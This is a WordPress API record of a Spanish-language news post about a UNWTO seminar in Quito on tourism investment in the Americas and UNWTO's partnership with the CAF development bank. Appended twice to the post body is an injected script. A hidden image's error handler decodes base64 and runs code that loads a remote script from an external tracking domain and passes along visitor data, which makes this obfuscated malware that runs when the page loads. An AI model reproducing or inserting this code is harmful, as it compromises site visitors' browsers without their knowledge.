{"id":2818,"date":"2023-07-04T11:01:27","date_gmt":"2023-07-04T14:01:27","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2818"},"modified":"2025-08-14T00:13:31","modified_gmt":"2025-08-14T03:13:31","slug":"la-omt-pone-el-foco-en-la-inversion-en-turismo-en-las-americas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2818","title":{"rendered":"LA OMT PONE EL FOCO EN LA INVERSI\u00d3N EN TURISMO EN LAS AM\u00c9RICAS"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#09507a\"><em>La OMT refuerza a\u00fan m\u00e1s su cooperaci\u00f3n con el Banco de Desarrollo de Am\u00e9rica Latina y el Caribe, reuniendo a l\u00edderes de los \u00e1mbitos p\u00fablico y privado para promover las inversiones en el sector tur\u00edstico.<\/em><\/h3>\n\n\n\n<p>En el contexto de la reuni\u00f3n de su&nbsp;<a href=\"https:\/\/www.unwto.org\/news\/unwto-welcomes-members-of-the-americas-to-ecuador\"><strong>68\u00aa<\/strong><\/a><a href=\"https:\/\/www.unwto.org\/es\/news\/es\/la-omt-da-la-bienvenida-a-los-miembros-de-las-americas-en-ecuador\"><strong>&nbsp;Comisi\u00f3n Regional para las Am\u00e9ricas<\/strong><\/a>&nbsp;en&nbsp; Quito (Ecuador), la OMT organiz\u00f3 el Seminario sobre Inversiones Sostenibles para explorar los principales retos y oportunidades en la regi\u00f3n.<\/p>\n\n\n\n<p><strong>Inversiones en turismo: una prioridad determinante<\/strong><strong><\/strong><\/p>\n\n\n\n<p>Los \u00faltimos datos de la OMT muestran que el turismo en las Am\u00e9ricas se est\u00e1 recuperando a un ritmo constante, en el primer trimestre de este a\u00f1o, las llegadas internacionales alcanzaron el 86% de los niveles de 2019. Adem\u00e1s, la inversi\u00f3n extranjera directa (IED) en el sector tur\u00edstico, que hab\u00eda experimentado un declive, ahora muestra signos de revitalizaci\u00f3n:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Los proyectos de inversi\u00f3n registrados aumentaron un 185% entre 2022 y 2021, con un valor total de 192,6 mil millones de d\u00f3lares. Esta tendencia refleja la creciente confianza de los inversores en el potencial de la regi\u00f3n.<\/li>\n\n\n\n<li>Adem\u00e1s, en 2021, la Inversi\u00f3n Extranjera Directa (IED) se increment\u00f3 hasta alcanzar los 134 mil millones de d\u00f3lares -un aumento interanual del 56%-, recuperando una parte sustancial de lo perdido en 2020.<\/li>\n<\/ul>\n\n\n\n<p>Para alcanzar los Objetivos de Desarrollo Sostenible (ODS) en las Am\u00e9ricas, es de suma importancia atraer inversiones que apoyen activamente su consecuci\u00f3n. Entre otras acciones, resulta crucial establecer un&nbsp;<strong>marco regulatorio multilateral<\/strong>&nbsp;s\u00f3lido que fomente las inversiones sostenibles.<\/p>\n\n\n\n<p><strong>El seminario de Quito proporciona una plataforma de alto nivel<\/strong><strong><\/strong><\/p>\n\n\n\n<p>En el&nbsp;<strong>Seminario sobre inversiones sostenibles: una estrategia hacia la competitividad<\/strong>&nbsp;ministros de turismo, inversores tradicionales y no tradicionales, fondos multilaterales, comunidades econ\u00f3micas regionales,&nbsp;<em>startups<\/em>&nbsp;de tecnolog\u00eda tur\u00edstica y medios de comunicaci\u00f3n compartieron sus buenas pr\u00e1cticas y conocimientos en este tema. Como muestra del apoyo pol\u00edtico de alto nivel a la labor de la OMT en este \u00e1mbito, el Seminario cont\u00f3 con la presencia de&nbsp;<strong>los ministros de turismo<\/strong>&nbsp;de Ecuador, Paraguay, Per\u00fa, Puerto Rico y del viceministro de la Rep\u00fablica Dominicana. Los principales objetivos del evento se centraron en:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Fomentar&nbsp;<strong>marcos estrat\u00e9gicos<\/strong>&nbsp;que faciliten el emprendimiento en la regi\u00f3n, incluidas medidas para&nbsp;<strong>salvaguardar, atraer y promover proyectos de inversi\u00f3n en turismo<\/strong>&nbsp;con el fin de acelerar la recuperaci\u00f3n econ\u00f3mica y favorecer la resiliencia.<\/li>\n\n\n\n<li>Impulsar la cooperaci\u00f3n sobre marcos de inversi\u00f3n sostenible para promover&nbsp;<strong>las inversiones en turismo y la creaci\u00f3n de empleo<\/strong>, incluso mediante el desarrollo de incentivos centrados en instrumentos de financiaci\u00f3n innovadores.<\/li>\n\n\n\n<li>Promover la cooperaci\u00f3n regional para racionalizar los mecanismos de inversi\u00f3n en turismo sostenible, a trav\u00e9s de medidas de recuperaci\u00f3n econ\u00f3mica y diversificaci\u00f3n con efectos multiplicadores.<\/li>\n<\/ul>\n\n\n\n<p>Contribuyeron a las discusiones representantes de alto nivel del Banco de Desarrollo de Am\u00e9rica Latina y el Caribe (CAF), fDi Intelligence del Financial Times, BID &#8211; Banco Interamericano de Desarrollo y, en representaci\u00f3n de los inversores y el sector privado, Hotel Jama Campay, WAYRA (Telef\u00f3nica), IMPAQTO, UnTours, Maraey, Metropolitan Touring, GHL Hoteles y la Confederaci\u00f3n Panamericana de Escuelas de Hoteler\u00eda, Gastronom\u00eda y Turismo, entre otros, para compartir modelos de inversi\u00f3n sostenibles en infraestructuras innovadoras.<\/p>\n\n\n\n<p><strong>OMT y CAF<\/strong><strong><\/strong><\/p>\n\n\n\n<p>En enero de 2023, la&nbsp;<strong>OMT y el Banco de Desarrollo de Am\u00e9rica Latina (CAF)<\/strong>&nbsp;anunciaron una nueva asociaci\u00f3n para promover y retener la inversi\u00f3n en turismo en toda la regi\u00f3n de Am\u00e9rica Latina y el Caribe. En Quito:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>La OMT y CAF publicaron la primera edici\u00f3n de las gu\u00edas&nbsp;<strong>\u00abTurismo y Negocio\u00bb.<\/strong>&nbsp;Bajo el t\u00edtulo \u00abInvertir en Ecuador\u00bb, el primer n\u00famero tiene como objetivo atraer inversi\u00f3n extranjera directa al sector tur\u00edstico de este pa\u00eds, mostrando las condiciones favorables existentes en su territorio y la s\u00f3lida recuperaci\u00f3n econ\u00f3mica que ha demostrado tras la pandemia, con un crecimiento del 2,9% en 2022, a lo que se suma un incremento del 21,7% en la IED entre 2021 y 2022.<\/li>\n\n\n\n<li>El acuerdo entre OMT y CAF prev\u00e9 el desarrollo de gu\u00edas de inversi\u00f3n tur\u00edstica para otros cinco pa\u00edses: Barbados, Ecuador, El Salvador, Panam\u00e1 y Uruguay<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.unwto.org\/es\/news\/es\/la-omt-pone-el-foco-en-la-inversion-en-turismo-en-las-americas\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"89\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/03\/omt-Noticias-1024x89.jpg\" alt=\"\" class=\"wp-image-290\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/03\/omt-Noticias-1024x89.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/03\/omt-Noticias-300x26.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/03\/omt-Noticias-768x67.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/03\/omt-Noticias-1536x133.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/03\/omt-Noticias-696x60.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/03\/omt-Noticias-1068x93.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/03\/omt-Noticias.jpg 1568w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La OMT refuerza a\u00fan m\u00e1s su cooperaci\u00f3n con el Banco de Desarrollo de Am\u00e9rica Latina y el Caribe, reuniendo a l\u00edderes de los \u00e1mbitos p\u00fablico y privado para promover las inversiones en el sector tur\u00edstico. En el contexto de la reuni\u00f3n de su&nbsp;68\u00aa&nbsp;Comisi\u00f3n Regional para las Am\u00e9ricas&nbsp;en&nbsp; Quito (Ecuador), la OMT organiz\u00f3 el Seminario sobre [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2819,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,22],"tags":[],"class_list":{"0":"post-2818","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2818"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2818"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2818\/revisions"}],"predecessor-version":[{"id":7036,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2818\/revisions\/7036"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2819"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2818"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2818"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2818"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}